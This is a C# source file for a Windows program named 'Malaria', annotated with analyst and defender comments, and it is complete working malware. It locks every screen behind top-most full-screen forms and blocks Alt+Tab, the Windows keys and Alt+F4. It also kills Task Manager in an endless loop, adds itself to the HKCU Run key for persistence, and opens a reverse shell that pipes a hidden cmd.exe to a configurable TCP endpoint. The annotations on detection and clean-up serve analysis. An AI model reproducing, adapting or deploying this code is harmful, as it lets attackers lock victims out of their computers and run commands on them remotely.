Form1.cs
using System;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Net.Sockets;
using System.Text;
using System.Threading;
using System.Windows.Forms;
using Gma.System.MouseKeyHook;
using Malaria.Properties;
using Microsoft.Win32;
namespace Malaria
{
public partial class Malaria : Form
{
private IKeyboardMouseEvents _globalHook;
private StreamWriter streamWriter;
// Constructor: every behaviour of this sample is started here, as soon as the form is created.
// Analyst summary of what the visible code launches:
//   - DisplayImageOnAllScreens: a borderless, top-most, maximized form on every monitor
//   - KillTaskManager: a separate thread that kills any process named "taskmgr"
//   - AutoStart: a separate thread that writes an HKCU Run value (logon persistence)
//   - StartReverseShell: a separate thread that connects out over TCP and pipes cmd.exe
//   - a global keyboard hook whose handler suppresses Alt+Tab, the Windows keys and Alt+F4
// Taken together this is screen-locker behaviour combined with remote command execution.
public Malaria()
{
InitializeComponent();
DisplayImageOnAllScreens();
// The three workers are plain Thread objects started with no further configuration.
new Thread(KillTaskManager).Start();
new Thread(AutoStart).Start();
new Thread(StartReverseShell).Start();
// Let the form see key events before its child controls do.
KeyPreview = true;
// System-wide key events; Hook presumably comes from the Gma.System.MouseKeyHook import - confirm.
_globalHook = Hook.GlobalEvents();
_globalHook.KeyDown += GlobalHook_KeyDown;
}
// Connects to a hard-coded TCP endpoint and bridges that socket to a hidden cmd.exe:
// each line read from the socket is written to cmd.exe's stdin, and each stdout/stderr
// line from cmd.exe is written back to the socket. In effect the remote peer gets an
// interactive command shell running as the current user (MITRE ATT&CK T1059.003).
//
// Defender notes, all derived from the code below:
//   - Process telemetry: cmd.exe spawned by this GUI executable with CreateNoWindow = true,
//     UseShellExecute = false and stdin/stdout/stderr all redirected.
//   - Network telemetry: an outbound TCP connection opened by the same process; the traffic
//     is written through a plain StreamWriter on the NetworkStream, with no TLS or
//     authentication layer visible here, so commands and output travel as readable text.
//   - Both catch blocks are empty, so connection or write failures leave no message or log.
private void StartReverseShell()
{
// Endpoint is compiled in. This copy points at loopback on port 9001; the original
// comments mark both values as placeholders, so built samples may differ.
string serverIp = "127.0.0.1"; // Replace with your IP
int serverPort = 9001; // Replace with the desired port
try
{
// The TcpClient(host, port) constructor connects immediately.
using (TcpClient client = new TcpClient(serverIp, serverPort))
{
using (NetworkStream stream = client.GetStream())
{
using (StreamReader rdr = new StreamReader(stream))
{
// Stored in a field so the output handlers can write to the socket; AutoFlush sends each line at once.
streamWriter = new StreamWriter(stream) { AutoFlush = true };
// Create a process to interact with cmd.exe
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
// No console window is shown for the child process.
p.StartInfo.CreateNoWindow = true;
// Required for stream redirection: the process is started directly, not via the shell.
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
// stdout of cmd.exe -> socket, one line at a time; empty lines are dropped.
p.OutputDataReceived += (sender, args) =>
{
if (!string.IsNullOrEmpty(args.Data))
{
try
{
streamWriter.WriteLine(args.Data); // Send command output
}
// Write failures are discarded silently.
catch (Exception ex) { }
}
};
// stderr of cmd.exe -> the same socket, handled identically to stdout.
p.ErrorDataReceived += (sender, args) =>
{
if (!string.IsNullOrEmpty(args.Data))
{
try
{
streamWriter.WriteLine(args.Data); // Send error output
}
// Write failures are discarded silently.
catch (Exception ex) { }
}
};
p.Start();
// Start asynchronous line-by-line reads so the two handlers above fire.
p.BeginOutputReadLine();
p.BeginErrorReadLine();
// Read commands from the server and pass them to cmd.exe
// The loop has no exit condition in this code; it ends only through an exception,
// which the outer catch swallows.
while (true)
{
string command = rdr.ReadLine();
if (!string.IsNullOrEmpty(command))
{
// Whatever text the peer sends is handed to cmd.exe unmodified.
p.StandardInput.WriteLine(command);
p.StandardInput.Flush();
}
}
}
}
}
}
// Any failure (connect refused, socket closed, process error) is discarded without a trace.
catch (Exception ex)
{
}
}
// Writes one line of child-process output to the shared streamWriter (the socket writer
// assigned in StartReverseShell). Nothing in this file subscribes this method to an event;
// StartReverseShell uses inline lambdas instead. The class is partial, so another part
// may reference it - confirm before treating it as dead code.
private void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
// Send the output from cmd.exe back to the server
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
streamWriter.WriteLine(outLine.Data);
}
// Write failures (including a streamWriter that was never assigned) are discarded silently.
catch (Exception err)
{
}
}
}
// KeyDown handler attached to the global hook in the constructor. It marks three key
// events as handled: Alt+Tab, either Windows key, and Alt+F4. All other keys fall through
// with e.Handled untouched. The intent is to stop the user switching away from or closing
// the full-screen forms; whether Handled actually suppresses the key system-wide depends
// on the hook library - confirm against Gma.System.MouseKeyHook.
// Defender note: a GUI process installing a system-wide keyboard hook is itself a useful signal.
private void GlobalHook_KeyDown(object sender, KeyEventArgs e)
{
// Intercept ALT + TAB key combination and block it
if (e.Alt && e.KeyCode == Keys.Tab)
{
e.Handled = true;
return;
}
// Intercept Windows key (WIN) and block it
if (e.KeyCode == Keys.LWin || e.KeyCode == Keys.RWin)
{
e.Handled = true;
return;
}
// Intercept ALT + F4 key combination and block it
if (e.Alt && e.KeyCode == Keys.F4)
{
e.Handled = true;
return;
}
}
// Logon persistence through the per-user Run key (MITRE ATT&CK T1547.001).
// Indicator visible in this code: a value named "Malaria" under
// HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run whose data is the path of the running
// executable. The key is under HKEY_CURRENT_USER, so the write happens in the user's own hive.
// Detection: registry-value-set auditing on this key. Clean-up: delete the value and the
// file it points to.
private static void AutoStart()
{
// Add the application to the Windows startup registry
// The second argument (true) opens the key writable.
var registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
// If the key could not be opened (null) nothing is written and no error is raised.
registryKey?.SetValue("Malaria", Application.ExecutablePath);
}
// Creates and shows one extra Form per attached monitor, sized to that monitor's bounds,
// borderless, maximized and TopMost, with the embedded "bg" resource stretched as its
// background. These overlay forms are what hides the desktop from the user; they are
// separate from the main Malaria form and are not tracked or closed anywhere in this file.
private static void DisplayImageOnAllScreens()
{
// Loop through all connected screens and display a full-screen form with a background image
foreach (var screen in Screen.AllScreens)
{
var form = new Form
{
StartPosition = FormStartPosition.CenterScreen,
Location = screen.Bounds.Location,
Size = screen.Bounds.Size,
// No title bar or border, so there is no close button to click.
FormBorderStyle = FormBorderStyle.None,
WindowState = FormWindowState.Maximized,
// Kept above ordinary windows.
TopMost = true,
BackgroundImageLayout = ImageLayout.Stretch
};
// Retrieve the background image from resources
// The resource may be stored as raw bytes or as an Image; both cases are handled.
var imageResource = Resources.ResourceManager.GetObject("bg");
if (imageResource is byte[] imageBytes)
{
form.BackgroundImage = Image.FromStream(new MemoryStream(imageBytes));
}
else if (imageResource is Image image)
{
form.BackgroundImage = image;
}
// If the resource is missing or of another type the form is shown without an image.
form.Show();
}
}
// Runs forever on its own thread, looking up processes named "taskmgr" and killing each
// one found, so the user cannot use Task Manager to end this program.
// Defender notes from the code: there is no delay between iterations, so the thread polls
// continuously, and Task Manager will appear to close immediately after launch. Only the
// process name "taskmgr" is targeted here; other process-management tools are not.
private static void KillTaskManager()
{
// Continuously monitor for and terminate Task Manager processes
while (true)
{
var processes = Process.GetProcessesByName("taskmgr");
foreach (var process in processes) process.Kill();
}
}
// Window-procedure override for the main form. It drops WM_SYSCOMMAND messages whose
// WParam is SC_CLOSE, which is the request generated by Alt+F4, the system-menu Close item
// or a title-bar close button, so this form ignores ordinary close requests. Every other
// message is forwarded to the base implementation. This covers only this form, not the
// per-screen overlay forms created in DisplayImageOnAllScreens.
protected override void WndProc(ref Message m)
{
// Intercept Windows system commands to block ALT + F4 (form closure)
const int wmSysCommand = 0x0112; // WM_SYSCOMMAND
const int scClose = 0xF060; // SC_CLOSE
if (m.Msg == wmSysCommand && (int)m.WParam == scClose)
{
return; // Prevent the form from closing
}
base.WndProc(ref m); // Call base method for other messages
}
// Runs when the main form does close (for example when the process is being shut down by
// a path that WndProc does not intercept). It detaches the key handler and disposes the
// global hook, then lets the base class continue. Nothing here stops the worker threads
// started in the constructor or removes the Run-key value written by AutoStart.
protected override void OnFormClosing(FormClosingEventArgs e)
{
// Unhook the global keyboard event hook when the form is closing
_globalHook.KeyDown -= GlobalHook_KeyDown;
_globalHook.Dispose();
base.OnFormClosing(e);
}
}
}